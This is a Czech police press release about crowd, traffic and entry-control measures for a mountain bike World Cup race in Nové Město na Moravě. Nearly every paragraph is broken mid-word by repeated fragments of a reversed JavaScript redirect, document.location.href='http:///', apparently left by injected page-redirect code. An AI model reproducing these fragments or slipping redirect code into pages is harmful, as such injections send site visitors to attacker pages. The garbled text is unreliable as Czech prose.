Rainbow page separator

Policisté přichystali opatření pro pohár horských kol

Pátek, 19. května 2017

Policie České republiky

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Do bezpečnostního opatření při Svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovém poháru horských kol ve Vysočina Areně budou nasazeni také policejní kynologové a speciální moni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torovací vozidlo. „Z našeho pohledu se jedná svým rozsahem o velmi významnou spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní akci. Priori[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou je chránit životy, zdraví a majetek občanů před případnými pachateli trestné činnosti,“ uvedl vedoucí žďárských policistů Bohumil Šlapák.
Hlídky dohlédnou na plynulost silničního provozu, především dopravní policisté budou pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomní na důležitých komunikacích. Dopravní omezení je v ulici Vlachovická, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to od křižovatky s ulicí Žďárská až do Vlachovic. Silnice je uzavřena pro veškerý provoz, s výjimkou průjezdu obyvatel Vlachovic a linkových au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusů. Provoz jen jedním směrem vede z Nového Města do Jiříkovic.
„Apelujeme na mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torizované návštěvníky, aby dbali pokynů pořadatelů a policistů. Řidičům doporučujeme naplánovat si příjezd s dostatečným předstihem. Vyšší počet návštěvníků může snížit kapacitu a dopravní obslužnost komunikací ve srovnání s běžným obdobím. Stejně tak musí řidiči respek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat aktuální dopravní značení. Při řešení protiprávních jednání budeme uplatňovat nulovou [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toleranci,“ upozornil Zdeněk Kubík, vedoucí žďárského dopravního inspek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torátu.
U vstupu do spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovního areálu se počítá s kontrolami. „Obracíme se na návštěvníky, aby se seznámili s pravidly vstupu dovnitř Vysočina Areny a nenosili s sebou předměty, které řád výslovně zakazuje. Jedná se o nebezpečné předměty, mezi které patří například pyrotechnika či nože,“ dodal Šlapák.